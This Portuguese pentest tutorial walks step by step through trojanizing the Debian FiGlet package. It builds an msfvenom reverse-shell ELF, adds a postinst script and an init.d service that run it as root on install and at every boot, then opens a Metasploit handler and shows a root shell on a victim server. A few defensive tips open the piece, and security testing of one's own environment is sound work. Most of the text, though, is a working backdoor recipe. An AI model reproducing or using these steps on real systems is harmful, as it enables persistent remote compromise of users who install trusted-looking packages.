Como já é de conhecimento de todos um ataque criminoso ou um pentest não se limita apenas ao conhecimento técnico, mas principalmente pela criatividade e a abordagem utilizada pelo atacante.
Neste artigo eu mostro como um atacante pode utilizar um pacote .deb para incluir um arquivo malicioso.
Certifique-se que todos os Desktops e Servidores Linux que estão conectado a sua rede estejam com um EDR instalado.
Defina uma lista de softwares homologados para serem utilizadas em seu ambiente.
Certifique-se que todos os downloads são realizados de fontes confiáveis.
Monitore as conexões realizadas em sua rede.
Seja criativo! :D e utilize este exemplo para avaliar a segurança do seu ambiente.
Crie e acesse o diretório pacotes-deb, em seguida gere um arquivo via msfvenom para realizar o Conexão Reversa.
Linuxmkdir pacotes-deb cd pacotes-deb/ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f elf -o acesso-remoto ls -l

Para este exemplo realize o download do pacote FiGlet.
Linuxwget http://ftp.br.debian.org/debian/pool/main/f/figlet/figlet_2.2.5-3+b1_amd64.deb

Execute o comando a seguir para extrair o conteúdo do pacote, em seguida acessa o diretório figlet e liste os diretórios.
Linuxdpkg -x figlet_2.2.5-3+b1_amd64.deb cd figlet/ ls -l

Copie o arquivo acesso-remoto para o diretório figlet/usr/bin, em seguida atribuía a permissão 777.
Linuxcd usr/bin/ cp ../../../acesso-remoto . chmod 777 acesso-remoto ls -l

Retorne ao diretório figlet e cria o diretório DEBIAN, em seguida crie o arquivo control.
Linuxcd ../../ mkdir DEBIAN cd DEBIAN/ vim control

Insira este conteúdo no arquivo control.
LinuxPackage: Modified Version: 2.2.5-4 Section: Text Priority: optional Architecture: amd64 Maintainer: Acesso Remoto Description: Falha de Seguranca

Crie o arquivo postinst.
Linuxvim postinst

Insira este conteúdo no arquivo postinst.
Linux#!/bin/bash chmod 777 /usr/share/figlet/acesso-remoto.sh cp /usr/share/figlet/acesso-remoto.sh /etc/init.d/ update-rc.d acesso-remoto.sh defaults ./etc/init.d/acesso-remoto.sh start &

Acesse o diretório /usr/share/figlet/ e crie o arquivo acesso-remoto.sh, com o seguinte conteúdo :

### BEGIN INIT INFO
# Provides: acesso-remoto
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Iniciar/Finalizar a Conexao
# Description: Falha de Seguranca
### END INIT INFO
PATH="/usr/bin"
case "$1" in
start)
echo -e "Conexao Iniciada\n"
/usr/bin/acesso-remoto
;;
stop)
echo -e "Conexao Finalizada\n"
kill -9 `ps -ef | grep -i 'acesso-remoto' | grep -v grep | awk '{print $2}'`
;;
*)
echo "Uso: /etc/init.d/acesso-remoto {start|stop}"
exit 1
esac
exit 0
Arquivo acesso-remoto.sh.

Retorne ao diretório /pacotes-deb/figlet/, altere as permissões do diretório DEBIAN para 755 e em seguida gere um novo pacote do figlet com as alterações realizadas "figlet.deb".
Linuxcd /pacotes-deb/figlet/ chmod -R 755 DEBIAN/ cd .. dpkg-deb --build figlet/ ls -l

Execute o msfconsole para preparar para a Conexão Reversa assim que o pacote figlet.deb for instalado na vítima.
Linuxmsfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x64/shell_reverse_tcp; set LHOST 192.168.0.100; set LPORT 4444; run"

No computador da vítima realize o download e instale o pacote figlet.
Linuxscp [email protected]:/pacotes-deb/figlet.deb . dpkg -i figlet.deb

Conexão Reversa estabelecida com sucesso!
Digite comando como : hostname, whoami, ls -l e etc.
Linuxhostname webserver whoami root ls -l

Para melhorar sua navegação no servidor digite :
Linux/bin/bash -i
